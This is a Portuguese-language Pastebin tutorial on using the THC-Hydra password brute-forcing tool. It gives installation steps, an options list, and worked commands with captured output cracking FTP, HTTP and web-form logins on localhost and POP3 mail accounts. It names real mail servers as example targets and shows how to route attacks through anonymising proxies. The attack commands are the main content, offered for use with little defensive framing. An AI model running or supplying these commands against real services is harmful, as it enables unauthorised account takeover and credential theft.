API tools faq
paste
Advertisement
syst3m_h4x0r

Linhas de comandos Hydra

syst3m_h4x0r
Jun 22nd, 2018
25,505
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 15.36 KB | None | 0 0
raw download clone embed print report
  1. INDICE :
  2. ___________________________________________________________________________________
  3. -0x00 - Instalando THC-HYDRA no (Windows XP).
  4. -0x01 - Executando.
  5. -0x02 - Opções.
  6. -0x03 - Exemplos{
  7. -- Exemplo (1) FTP
  8. -- Exemplo (2) http-head
  9. -- Exemplo (3) http-post-form
  10. -- Exemplo (4) POP3
  11. -0x04 - Proxy.
  12. ___________________________________________________________________________________
  13.  
  14. * THC-Hydra:Open Source/Multiplataforma/
  15. * Desenvolvido por uma organização Alemã chamada "The Hacker's Choice"(THC).
  16. * O Programa pode ser adquirido gratuitamente no site oficial do projeto : http://freeworld.thc.org/thc-hydra/
  17.  
  18. Hydra usa um mecanismo de FORÇA BRUTA/BRUTE FORCE (ou busca exaustiva):
  19. Este tipo de ataque consiste em fazer o programa trabalhar exaustivamente tentando combinações de
  20. senhas e nomes de usuários ate chegar ao seu objetivo obvio.
  21.  
  22. Protocolos suportados atualmente na versão 5.4:
  23. TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
  24. RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
  25. ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
  26. ===================================================================================
  27. [0x00] Instalando THC-HYDRA no (Windows XP) :
  28. ===================================================================================
  29. O Primeiro passo é fazer o download da V.Win32/Cywin do programa no site oficial,descompactar e rodar.
  30.  
  31. -> Criar uma variável de ambiente em :
  32. painel de controle > sistema > aba avançado > variáveis de ambiente e adicionando o caminho em path.
  33. exemplo: C:\hydra-5.4-win;
  34.  
  35. ===================================================================================
  36. [0x01] Executando :
  37. ===================================================================================
  38. Rode 'hydra' no prompt de comandos para chamar o programa.
  39.  
  40. ///////////////////////////////////////////////////////////////////////////////////
  41. C:\Documents and Settings\user\Desktop>hydra
  42. Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC <[email protected]>
  43.  
  44. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
  45. [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
  46. server service [OPT]
  47.  
  48. Options:
  49. -R restore a previous aborted/crashed session
  50. -S connect via SSL
  51. -s PORT if the service is on a different default port, define it here
  52. -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  53. -p PASS or -P FILE try password PASS, or load several passwords from FILE
  54. -e ns additional checks, "n" for null password, "s" try login as pass
  55. -C FILE colon seperated "login:pass" format, instead of -L/-P options
  56. -M FILE server list for parallel attacks, one entry per line
  57. -o FILE write found login/password pairs to FILE instead of stdout
  58. -f exit after the first found login/password pair (per host if -M)
  59. -t TASKS run TASKS number of connects in parallel (default: 16)
  60. -w TIME defines the max wait time in seconds for responses (default: 30)
  61. -v / -V verbose mode / show login+pass combination for each attempt
  62. server the target server (use either this OR the -M option)
  63. service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
  64. imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
  65. cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
  66. rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
  67. teamspeak sip vmauthd
  68. OPT some service modules need special input (see README!)
  69.  
  70. Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
  71. Hydra is a tool to guess/crack valid login/password pairs - use allowed only
  72. for legal purposes! If used commercially, tool name, version and web address
  73. must be mentioned in the report. Find the newest version at http://www.thc.org
  74. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  75.  
  76. Podemos ver acima que quando executado exibe informações como versão,sintaxe de uso e
  77. as opções seguidas de comentários.
  78.  
  79. ===================================================================================
  80. [0x02] Opções :
  81. ===================================================================================
  82.  
  83. -R Restaura sessões abordadas/quebradas.
  84. -S Conexão segura usando SSL caso seja necessário.
  85. -s Especifica qual porta o hydra vai estabelecer a conexão.
  86. -l Nome|login da vitima.
  87. -L Carrega uma lista contendo nomes|logins de vitimas.(1 por linha)
  88. -p Especifica senha única.
  89. -P Carrega uma lista com senhas.(1 por linha)
  90. -e ns adcional 'n' testa senha em branco || adicional 's' testa user como pass.
  91. -C Usado para carregar um arquivo contendo usuário:senha. formato usuário:senha equivale a -L/-P.
  92. -M Carrega lista de servidores alvos.(1 por linha)
  93. -o Salva as senhas encontradas dentro do arquivo que você especificar.
  94. -f Faz o programa parar de trabalhar quando a senha||usuário for encontrada[o].
  95. -t Limita o numero de solicitações por vez.(default: 16)
  96. -w Define o tempo máximo em segundos para esperar resposta do serv.(default: 30s)
  97. -v / -V Modo verbose do programa. 'V' mostra todas tentativas.
  98.  
  99. Server: Servidor alvo.
  100. Exemplos:
  101. 127.0.0.1
  102. localhost
  103. pop.gmail.com
  104. pop.mail.yahoo.com.br
  105. pop3.live.com
  106.  
  107. Service: Protocolo||Serviço que sera chamado|usado.
  108. Exemplos:
  109. pop3
  110. ftp
  111. smtp
  112. vnc
  113. imap
  114. http-head
  115. http-post-form
  116.  
  117. ===================================================================================
  118. [0x03] Exemplos:
  119. ===================================================================================
  120. Colocarei na pratica as opções já explicadas no índice [0x02] deste tutorial.
  121.  
  122. Exemplo (1) FTP
  123. ===================================================================================
  124. Sintaxe:
  125. -----------------------------------------------------------------------------------
  126. hydra -l root -P pass.txt -s 21 localhost ftp
  127. -----------------------------------------------------------------------------------
  128.  
  129. Saida:
  130. ///////////////////////////////////////////////////////////////////////////////////
  131. Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  132. Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
  133. [DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
  134. [DATA] attacking service ftp on port 21
  135. [21][ftp] host: 127.0.0.1 login: root password: chaw123
  136. [STATUS] attack finished for localhost (waiting for childs to finish)
  137. Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
  138. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  139.  
  140. *[21][ftp] host: 127.0.0.1 login: root password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
  141. pertencente ao usuário root.
  142.  
  143.  
  144. Exemplo (2) http-head
  145. ===================================================================================
  146. Sintaxe:
  147. -----------------------------------------------------------------------------------
  148. hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
  149. -----------------------------------------------------------------------------------
  150.  
  151. Saida:
  152. ///////////////////////////////////////////////////////////////////////////////////
  153. Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  154. Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
  155. [DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
  156. [DATA] attacking service http-head on port 80
  157. [80][www] host: 127.0.0.1 login: root password: Est2yu
  158. [STATUS] attack finished for localhost (waiting for childs to finish)
  159. select: Bad file descriptor
  160. Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
  161. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  162.  
  163. O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo 'saida.txt'.
  164.  
  165. Dentro do arquivo foi escrito as seguintes linhas pelo programa:
  166. -----------------------------------------------------------------------------------
  167. # Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
  168. pass.txt -o saida.txt localhost http-head)
  169. [80][www] host: 127.0.0.1 login: root password: Est2yu
  170. -----------------------------------------------------------------------------------
  171. /xammp/ é o caminho/path -> http://localhost/xammp/
  172.  
  173.  
  174. Exemplo (3) http-post-form
  175. ===================================================================================
  176. Sintaxe:
  177. -----------------------------------------------------------------------------------
  178. hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
  179. http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>"
  180. -----------------------------------------------------------------------------------
  181.  
  182. Saida:
  183. ///////////////////////////////////////////////////////////////////////////////////
  184. Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  185. Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
  186. [DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
  187. [DATA] attacking service http-post-form on port 80
  188. [80][www-form] host: 127.0.0.1 login: admin password: admin
  189. [STATUS] attack finished for 127.0.0.1 (valid pair found)
  190. Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
  191. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  192.  
  193. -> Para criar esta sintaxe tive que olhar o código da pagina >>
  194. -----------------------------------------------------------------------------------
  195. <form action="index.php" method="POST">
  196. <input type="text" name="nome" /><BR><br>
  197. <input type="password" name="senha" /><br><br>
  198. <input type="submit" name="boo" value="Enviar">
  199. <br>
  200. </form>
  201. -----------------------------------------------------------------------------------
  202.  
  203. __________________________________________________________
  204. |__Mozilla Firefox___________________________________|-|_|X|
  205. | |
  206. | |
  207. | |
  208. | |
  209. | _____________________________________ |
  210. | | nome | |
  211. | |_____________________________________| |
  212. | _____________________________________ |
  213. | | senha | |
  214. | |_____________________________________| |
  215. | |
  216. | ________________ |
  217. | | Enviar | |
  218. | |________________| |
  219. | |
  220. |__________________________________________________________|
  221. |_Concluído________________________________________________|
  222.  
  223. -> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
  224. -> Use o complemento 'live HTTP headers' para Firefox que com toda certeza facilitara bastante sua vida.
  225. -> Quando envio dados errados a pagina me retorna 'invalido' no titulo.
  226. -----------------------------------------------------------------------------------
  227. <title>invalido</title>
  228. -----------------------------------------------------------------------------------
  229.  
  230. Complete ->
  231. -----------------------------------------------------------------------------------
  232. hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
  233. "[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]"
  234. -----------------------------------------------------------------------------------
  235.  
  236. Completo ->
  237. -----------------------------------------------------------------------------------
  238. hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>"
  239. -----------------------------------------------------------------------------------
  240.  
  241. Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
  242. -> ^USER^ = admin e ^PASS^ = $_ <-
  243.  
  244.  
  245. Outro exemplo -> http://localhost/login/login.html
  246. -> Codigo fonte da pagina >>
  247. -----------------------------------------------------------------------------------
  248. <form action="login_vai.php" method="post"><br>
  249. Login: <input type="text" name="login"><br>
  250. Senha: <input type="password" name="senha"><br>
  251. <input type="submit" value="OK!">
  252. </form>
  253. -----------------------------------------------------------------------------------
  254.  
  255. Sintaxe:
  256. -----------------------------------------------------------------------------------
  257. hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
  258. -----------------------------------------------------------------------------------
  259.  
  260. Saida:
  261. ///////////////////////////////////////////////////////////////////////////////////
  262. Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  263. Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
  264. [DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
  265. [DATA] attacking service http-post-form on port 80
  266. [80][www-form] host: 127.0.0.1 login: admin password: teste
  267. [STATUS] attack finished for localhost (valid pair found)
  268. Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
  269. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  270.  
  271.  
  272. Exemplo (4) POP3
  273. ===================================================================================
  274. Sintaxe:
  275. -----------------------------------------------------------------------------------
  276. hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
  277. -----------------------------------------------------------------------------------
  278.  
  279. Saida:
  280. ///////////////////////////////////////////////////////////////////////////////////
  281. Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
  282. Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
  283. [DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
  284. [DATA] attacking service pop3 on port 110
  285. [STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
  286. [110][pop3] host: pop3.xxx.com login: [email protected] password: 123456
  287. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  288.  
  289.  
  290. ===================================================================================
  291. [0x04] Proxy:
  292. ===================================================================================
  293.  
  294. Proxy web:
  295. -----------------------------------------------------------------------------------
  296. HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
  297. -----------------------------------------------------------------------------------
  298.  
  299. Para qualquer outro use : HYDRA_PROXY_CONNECT
  300. -----------------------------------------------------------------------------------
  301. HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
  302. -----------------------------------------------------------------------------------
  303.  
  304. Com autentificação :
  305. -----------------------------------------------------------------------------------
  306. HYDRA_PROXY_AUTH="nome:senha"
  307. -----------------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!